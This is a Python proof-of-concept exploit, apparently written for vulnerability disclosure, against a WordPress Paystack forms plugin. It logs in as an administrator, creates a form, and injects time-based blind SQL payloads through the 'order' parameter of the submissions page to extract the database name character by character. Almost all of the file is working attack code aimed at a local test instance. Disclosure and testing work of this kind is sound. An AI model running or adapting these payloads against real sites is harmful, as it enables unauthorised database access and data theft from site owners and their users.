import re
import time
import string
import requests


# To set up a proxy, enter the server address below.
PROXY_SERVER = None
proxies = {
    "https": PROXY_SERVER,
    "http": PROXY_SERVER,
}

SLEEP_TIMER = 1

def __login_get_session(login_id, login_pw):
    session = requests.session()
    data = {
        "log": login_id,
        "pwd": login_pw,
        "wp-submit": "Log In",
        "testcookie": 1
    }
    resp = session.post(f"{TARGET}/wp-login.php", data=data, proxies=proxies)
    if True in ["wordpress_logged_in_" in cookie for cookie in resp.cookies.keys()]:
        print(f" |- Successfully logged in with account {login_id}.")
        return session
    else:
        raise Exception(f"[-] Failed to log in.")

def add_paystack_form(session, form_title):
    resp = session.get(f"{TARGET}/wp-admin/post-new.php?post_type=paystack_form", proxies=proxies)
    pattern = r'<input[^>]*name=[\'"]([^\'"]+)[\'"][^>]*value=[\'"]([^\'"]+)[\'"]'
    matches = re.findall(pattern, resp.text)
    data = {}
    for name, value in matches:
        data[name] = value
    data["post_title"] = form_title
    resp = session.post(f"{TARGET}/wp-admin/post.php", data=data, proxies=proxies)
    pattern = r'\[pff-paystack id=&quot;(\d+)&quot;\]'
    match = re.search(pattern, resp.text)
    if match:
        paystack_form_id = match.group(1)
        print(f" |- Extracted Paystack Form ID: {paystack_form_id}")
        return paystack_form_id
    else:
        raise Exception(f"[-] Failed to find Paystack Form ID.")


def poc_get_db_length(session, paystack_form_id):
    length = 1
    while True:
        payload = f", (select sleep({SLEEP_TIMER}) from dual where (IF(LENGTH(DATABASE()) = {length},1,0)))"
        params = {
            "post_type": "paystack_form",
            "page": "submissions",
            "form": paystack_form_id,
            "orderby": "",
            "order": payload
        }
        start_time = time.time()
        session.post(f"{TARGET}/wp-admin/edit.php", params=params, proxies=proxies)

        if (time.time() - start_time) < SLEEP_TIMER:
            print(f" |- Database name length is greater than {length}.")
            length += 1
        else:
            print(f" |- Database name length: {length}")
            break

    return length 
    

def poc_get_db_name(session, db_length, paystack_form_id):
    
    db_name = ""
    for i in range(1, db_length+1):
        for char in string.ascii_letters + string.digits:
            payload = f", (select sleep({SLEEP_TIMER}) from dual where (IF(SUBSTR(DATABASE(),{i},1)='{char}',1,0)))"
            params = {
                "post_type": "paystack_form",
                "page": "submissions",
                "form": paystack_form_id,
                "orderby": "",
                "order": payload
            }
            start_time = time.time()
            session.post(f"{TARGET}/wp-admin/edit.php", params=params, proxies=proxies)

            if (time.time() - start_time) > SLEEP_TIMER:
                db_name += char
                print(f" |- Database name: {db_name.ljust(db_length, '*')}")
                break
    
    print(f" |- Successfully extracted the database name: {db_name}")

def poc():
    ####
    # 1. Log in as administrator
    ####
    print(f"[+] Logging in with administrator account.")
    print(f" |- Account: {ADMIN_ID}, Password: {ADMIN_PW}")
    admin_session = __login_get_session(ADMIN_ID, ADMIN_PW)
    admin_session.get(f"{TARGET}/wp-admin/", proxies=proxies)
    
    ####
    # 2. Add Paystack Form
    ####
    print(f"[+] Adding Paystack Form.")
    paystack_form_id = add_paystack_form(admin_session, form_title="PoC")

    ####
    # 3. Retrieve database name length
    ####
    print(f"[+] Retrieving database name length.")
    db_length = poc_get_db_length(admin_session, paystack_form_id=paystack_form_id)

    ####
    # 4. Retrieve database name
    ####
    print(f"[+] Retrieving database name.")
    poc_get_db_name(admin_session, db_length, paystack_form_id=paystack_form_id)


if __name__ == "__main__":

    # WordPress Target
    TARGET = "http://localhost:8080"

    # Administrator ID/PW
    ADMIN_ID = "admin"
    ADMIN_PW = "admin"

    poc()
